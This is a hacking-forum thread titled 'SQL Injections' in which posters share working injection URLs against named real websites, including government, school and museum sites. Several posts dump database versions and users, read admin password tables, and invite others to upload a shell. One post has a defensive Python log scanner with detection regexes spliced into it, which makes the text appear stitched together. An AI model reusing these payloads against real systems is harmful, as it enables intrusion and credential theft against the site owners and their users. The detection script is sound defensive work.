SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Code:
    http://gps.smartzone.ru/razdel.php?id_raz=-1+UNION+SELECT+1,user()--&param=list
    
    phpbb3_users
    client
    smartzone_users
     
  2. danielito

    danielito Banned

    Joined:
    7 Feb 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -1
    http://indabattle.com/Malenkiy_Pavlik/?page=-255+union+select+1,2,3,table_name,5+from+information_schema.tables+limit+222,1--


    admin panel: /administrator

    Can anyone upload a shell? Or get into the admin panel?
    Passwords are in the form md5:salt
     
  3. Hack_ERR++

    Hack_ERR++ Member

    Joined:
    13 Aug 2009
    Messages:
    41
    Likes Received:
    9
    Reputations:
    0
    Code:
    http://autocatalog.bg/marka.php?id=-23+union+select+1,2,3,concat_ws(0x20,type,password),5,6+from+admin_users--
    http://www.bigbay.bz/develdesc.php?id=-23+union+select+1,concat_ws%280x20,id,username,password%29,3,4,5,6,7,8,9,10,11,12,13+from+prop_admin--
    
     
  4. barbara

    barbara New Member

    Joined:
    21 Feb 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://kostroma.rfn.ru/rnews.html?id=46429+OR+1=1+ORDER+BY+11--
    http://kostroma.rfn.ru/rnews.html?id=46429+OR+1=1+ORDER+BY+SYSDATE--
    
    Commands like these work, which suggests the DBMS is Oracle and the table has 11 columns. If anyone knows Oracle well, feel free to play around. Or is there unlikely to be anything useful to dig up here? :)
     
  5. Cennarios

    Cennarios Elder

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.exploratorium.edu/imaging_station/gallery.php?Asset=Human%20red%20blood%20cells&Group=&Category=Blood%20Cells&Section=Introduction'+or+1+group+by+concat((select+user()),floor(rand(0)*2))+having+min(0)--+

    user:[email protected]
     
  6. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    smallville
    http://smallville.fanwebsite.co.uk/music.php?smallville_episodeid=-67+union+select+1,version%28%29,3,4,5--
     
    1 person likes this.
  7. Slay90

    Slay90 Member

    Joined:
    12 Apr 2009
    Messages:
    146
    Likes Received:
    16
    Reputations:
    -5
    //the anti-duplicate system is described in the first post
     
    #13587 Slay90, 21 Feb 2011
    Last edited by a moderator: 21 Feb 2011
  8. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    nothing personal

    http://islamvolga.ru/veroucheniya.php?cat=-1%20and%201=2%20union%20select%201,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6,7--

    5.1.47-rel11.2-log djklm38@localhost djklm38_forall unknown-linux-gnu

    http://islamvolga.ru/veroucheniya.php?cat=-1%20and%201=2%20union%20select%201,concat_ws(char(58),username,password,email),3,4,5,6,7%20from%20erz_users--
     
    1 person likes this.
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    _http://k156.ru/2/1/catview.php?cat_id=-2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5--

    _http://monolit44.ru/catviewarm.php?catarm_id=-10+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user())--

    _http://stroyvektor.com/foto.php?fot=-2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--

    _http://citadel-kostroma.ru/catviewflat.php?cat57_id2=-9+union+select+concat_ws(0x3a,version(),database(),user())--

    _http://www.newchemistry.ru/himprocesses.php?cat_id=-36+union+select+concat_ws(0x3a,version(),database(),user())--

    _http://www.marich.od.ua/board.php?cat_id=-2+union+select+concat_ws(0x3a,version(),database(),user())--
     
    _________________________
    #13589 winstrool, 22 Feb 2011
    Last edited: 22 Feb 2011
  10. danielito

    danielito Banned

    Joined:
    7 Feb 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -1
    http://www.astrakhanfm.ru/news/news.php?id=99999+union+select+1,2,3,4,version(),6,7--
     
  11. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://la2-shop.ru/articles.php?id=-2'+union+select+1,2,version()--'
    one big hole...
     
  12. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://www.doneco.org.ua/showwork.php?id=9999+union+select+1,version()--
    4.1.22-standard-log...(
     
  13. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Bar SPB.

    h**p://www.barspb.ru/places.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

    Version: 5.1.50-log
    User: [email protected]
     
  14. TOP4

    TOP4 Banned

    Joined:
    19 Dec 2010
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    http://www.voladm.gov.ua/news.php?id=50901+union+select+1,user(),3,4,5,database(),7,8,9,10,11,12,13,14--
     
  15. TOP4

    TOP4 Banned

    Joined:
    19 Dec 2010
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    http://www.cva.edu/gallery/detail.php?ID=86-999.9+union+select+1,2,3,4,5,6,7--
    http://biophysics.asu.edu/CBP/seminars.php?type=Meeting&ID=10647-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
    http://www.arabpressnetwork.org/newspapersprint.php?id=173-999.9+union+select+1,2,3,4,5--
     
  16. telon

    telon New Member

    Joined:
    25 Feb 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    -5
    http://www.mywowgold.ru/modules/zakaz/?data[form][blank_amount]='
     
  17. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    wcg.ru PR-5

    h**p://www.wcg.ru/grandfinal/index.php?ID=-1+union+select+1,2--
    h**p://www.wcg.ru/wcgtv/addcnt.php?ID=-1+union+select+1--

    Version: 5.1.37
    Database: wcg
    User: wcg@localhost
     
    #13597 keng, 25 Feb 2011
    Last edited: 26 Feb 2011
    1 person likes this.
  18. nemaniak

    nemaniak Elder

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    russobit-press.ru

    Code:
    http://russobit-press.ru/forum.php/news.php?language=&stage=message&show=-31212+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--
    Code:
    5.0.45:root@localhost:rbit
    kansaspublicradio.org PR-5

    Code:
    http://kansaspublicradio.org/newsstory.php?itemID=15091+and+substring((SELECT+version()),1,1)=5+--+
    caldwellschools.org PR-5

    Code:
    http://www.caldwellschools.org/News/FullStory.php?NewsID=842+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),1,63),floor(rand(0)*2)))+--+
    Code:
    Duplicate entry '5.0.261' for key 1
     
    1 person likes this.
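    The payloads posted in this thread fall into a handful of recognisable families: UNION SELECT column probing with version()/user()/database(), reads of admin or user tables, the floor(rand(0)*2) GROUP BY duplicate-key error trick, boolean blind tests on substring(version()), and OR 1=1 ORDER BY column counting. As an added example (not code from the thread or any of the posters), the Python scanner below flags those families in web-server access-log lines; the combined log format, the RFC 5737 client addresses and the request paths in the sample are assumptions, and the sample lines are constructed, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# One regex per payload family seen in the thread (matching is done on the
# decoded query string, so '+', %20 and %28/%29 encodings do not matter).
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "fingerprint_fn": re.compile(r"\b(?:version|user|database|info)\s*\(\s*\)|@@version", re.I),
    "schema_read": re.compile(r"information_schema\.tables|\bfrom\s+\w*(?:admin|users)\w*", re.I),
    "error_based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "boolean_blind": re.compile(r"substring\s*\(\s*\(?\s*select\s+version\s*\(\s*\)", re.I),
    "orderby_probe": re.compile(r"\bor\s+1\s*=\s*1\s+order\s+by\b", re.I),
}

def decode(query: str) -> str:
    """Undo URL encoding twice (catches double encoding) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(query)))

def classify(url: str) -> list:
    """Return the names of the payload families present in a request URL."""
    _, _, query = url.partition("?")
    decoded = decode(query)
    return [name for name, rx in RULES.items() if rx.search(decoded)]

# Combined-format access log: client ident user [time] "METHOD path HTTP/x" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def scan_log(lines):
    """Return (client, script_path, families) for every line that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (fam := classify(m.group(2))):
            hits.append((m.group(1), m.group(2).partition("?")[0], fam))
    return hits

# Constructed sample log: RFC 5737 addresses and made-up paths; the payload
# shapes follow the posts above but none of these are real requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Feb/2011:10:01:02 +0300] "GET /news.php?id=123 HTTP/1.1" 200 4120',
    '203.0.113.7 - - [26/Feb/2011:10:01:09 +0300] "GET /news.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3-- HTTP/1.1" 200 4233',
    '198.51.100.4 - - [26/Feb/2011:10:02:11 +0300] "GET /story.php?NewsID=842+or+(select+count(*)+from+(select+1+union+select+2)x+group+by+concat(mid(version(),1,63),floor(rand(0)*2)))+--+ HTTP/1.1" 500 611',
    '198.51.100.4 - - [26/Feb/2011:10:02:40 +0300] "GET /story.php?itemID=15091+and+substring((SELECT+version()),1,1)=5+--+ HTTP/1.1" 200 4233',
    '192.0.2.9 - - [26/Feb/2011:10:03:00 +0300] "GET /rnews.html?id=46429+OR+1=1+ORDER+BY+SYSDATE-- HTTP/1.1" 200 9001',
    '192.0.2.9 - - [26/Feb/2011:10:03:30 +0300] "GET /search.php?q=union+station+select+seats HTTP/1.1" 200 1500',
]

if __name__ == "__main__":
    for client, script, fam in scan_log(SAMPLE_LOG):
        print(client, script, ", ".join(fam))
```

    The last sample line ("union station select seats") is benign and is not flagged, since the UNION rule requires SELECT to follow UNION directly; a production deployment would also want to cover POST bodies and header values, which this log format does not carry.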
  19. ubi

    ubi Elder

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://hyenacart.com/bellajunction/index.php?info=null+and+1=2+union+select+1,version(),3,4,5,6

    4.1.22-standard
     
  20. Fooog

    Fooog Elder

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    acmenoveltyarchive.org
    PR 4
    Code:
    http://www.acmenoveltyarchive.org/category.php?cat=-1 union select 1,concat_ws(0x3a,user(),version(),database()),3 --

    stormdance.de
    PR 4
    Code:
    http://www.stormdance.de/?cat=-22 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9 --

    citymagazine.rs
    PR 5
    Code:
    http://www.citymagazine.rs/page.php?cat=4 union select info() --

    ipv6.njust.edu.cn
    .edu
    PR 1
    Code:
    http://ipv6.njust.edu.cn/show.php?id=-1 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15 --
     
    #13600 Fooog, 26 Feb 2011
    Last edited: 26 Feb 2011
    1 person likes this.